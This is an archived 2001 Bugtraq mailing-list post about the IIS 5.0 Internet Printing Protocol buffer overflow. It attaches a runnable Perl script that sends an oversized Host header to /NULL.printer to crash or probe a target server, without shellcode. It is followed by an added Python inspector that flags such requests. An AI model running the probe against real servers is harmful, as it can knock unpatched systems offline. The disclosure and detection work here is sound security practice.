[20537] in bugtraq
Re: Windows 2000 IIS 5.0 Remote buffer overflow vulnerability
daemon@ATHENA.MIT.EDU (Wanderley J. Abreu Jr.)
Wed May 2 23:23:45 2001
Message-ID: <00dd01c0d320$58e39d20$f9b9dec8@corvo>
Date: Wed, 2 May 2001 12:55:34 -0300
Reply-To: "Wanderley J. Abreu Jr." <storm@UNIKEY.COM.BR>
From: "Wanderley J. Abreu Jr." <storm@UNIKEY.COM.BR>
To: BUGTRAQ@SECURITYFOCUS.COM
Hi Everyone,
I've coded a very simple vulnerability test that actually causes the memory leak, but I still don't have the shellcode to overwrite the EIP register.
Cheers,
Wanderley
Attachment: webexplt.pl
#!/usr/bin/perl
# Exploit By storm@stormdev.net
# Tested with success against Win2k IIS 5.0 + SP1
# Remote Buffer Overflow Test for Internet Printing Protocol
# This code was written after eEye brought this issue in BugTraq.
use strict;
use warnings;
use Socket;

print "-- IPP - IIS 5.0 Vulnerability Test By Storm --\n\n";

if (not $ARGV[0]) {
    print qq~
Usage: webexplt.pl <host>
~;
    exit;
}

my $ip = $ARGV[0];
print "Sending Exploit Code to host: " . $ip . "\n\n";

# Request the .printer ISAPI extension with an oversized Host header.
my @results = sendexplt("GET /NULL.printer HTTP/1.0\n"
    . "Host: "
    . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n");

print "Results:\n";
# An empty reply (the server closed the connection without answering) is
# what this test treats as a positive.
if (not @results) {
    print "The Machine tested has the IPP Vulnerability!";
}
print @results;

# Connect to TCP port 80 on $ip, send the request and return the reply lines.
sub sendexplt {
    my ($pstr) = @_;
    my $target = inet_aton($ip) || die("inet_aton problems");
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0)
        || die("Socket problems\n");
    if (connect(S, sockaddr_in(80, $target))) {
        select(S);
        $| = 1;              # unbuffered, so the request is flushed at once
        print $pstr;
        my @in = <S>;
        select(STDOUT);
        close(S);
        return @in;
    } else {
        die("Can't connect...\n");
    }
}
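The defender's side of the same request shape, as an added example that is not part of Wanderley's script or this post: a small request inspector that flags what the script above sends, namely a request for a *.printer resource (the IIS 5.0 IPP ISAPI extension) whose Host header is abnormally long. The threshold HOST_LEN_THRESHOLD, the Finding/parse_request/inspect_request names and the three sample requests are my own constructions, not values from the post or any advisory. It also merges folded continuation lines and repeated Host headers before measuring, since a per-line length check would otherwise miss a payload split across lines.

```python
"""Request inspector for the probe shape discussed on this page: a request
for a *.printer resource carrying an oversized Host header.

Added example for this list post; not part of the original script.
HOST_LEN_THRESHOLD and the sample requests are constructed assumptions.
"""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# Assumed alert threshold (bytes). A legitimate Host value is a hostname or
# IP address, optionally with a port, and stays far below this.
HOST_LEN_THRESHOLD = 256


@dataclass
class Finding:
    severity: str   # "high", "medium" or "low"
    path: str
    host_len: int
    reason: str


def parse_request(raw: bytes) -> Optional[Tuple[str, str, Dict[str, str]]]:
    """Return (method, target, headers) for an HTTP/1.x request head.

    Header names are lower-cased. Obsolete line folding (a continuation
    line starting with SP/HTAB) and repeated headers are merged into one
    value so the length check sees the whole Host value. Bare LF is
    accepted as well as CRLF, because the probe on this page sends "\n".
    Returns None for a malformed request line or header.
    """
    text = raw.replace(b"\r\n", b"\n").decode("latin-1")
    lines = text.split("\n\n", 1)[0].split("\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    method, target, _version = parts
    headers: Dict[str, str] = {}
    last: Optional[str] = None
    for line in lines[1:]:
        if not line:
            continue
        if line[0] in " \t" and last is not None:
            headers[last] += " " + line.strip()      # folded continuation
            continue
        name, sep, value = line.partition(":")
        name = name.strip().lower()
        if not sep or not name:
            return None
        value = value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
        last = name
    return method, target, headers


def inspect_request(raw: bytes) -> Optional[Finding]:
    """Classify one raw request; None means nothing noteworthy."""
    parsed = parse_request(raw)
    if parsed is None:
        return Finding("medium", "?", 0, "malformed request line or header")
    _method, target, headers = parsed
    path = target.split("?", 1)[0]
    host = headers.get("host", "")
    hits_printer = path.lower().endswith(".printer")
    if hits_printer and len(host) > HOST_LEN_THRESHOLD:
        return Finding("high", path, len(host),
                       "oversized Host header sent to the .printer ISAPI")
    if hits_printer:
        return Finding("low", path, len(host),
                       ".printer request: IPP ISAPI extension is reachable")
    if len(host) > HOST_LEN_THRESHOLD:
        return Finding("medium", path, len(host), "oversized Host header")
    return None


# Constructed sample traffic. PROBE mirrors the shape of the script above
# (bare LF, long run of 'A' in Host); FOLDED splits the same payload across
# a folded continuation line, which a naive per-line check would miss.
PROBE = b"GET /NULL.printer HTTP/1.0\nHost: " + b"A" * 500 + b"\n\n"
BENIGN = b"GET /index.html HTTP/1.0\r\nHost: www.example.com\r\n\r\n"
FOLDED = (b"GET /x.printer HTTP/1.0\r\nHost: " + b"A" * 200
          + b"\r\n " + b"A" * 200 + b"\r\n\r\n")


if __name__ == "__main__":
    for name, req in (("PROBE", PROBE), ("BENIGN", BENIGN), ("FOLDED", FOLDED)):
        print(name, inspect_request(req))
```

Run it as is to see the three sample verdicts; in practice the same inspect_request call would sit behind whatever captures raw requests in front of the server. The "low" verdict for any .printer request is deliberate: the post's test works by reaching that ISAPI extension at all, so seeing such requests is worth recording even when the Host header is short.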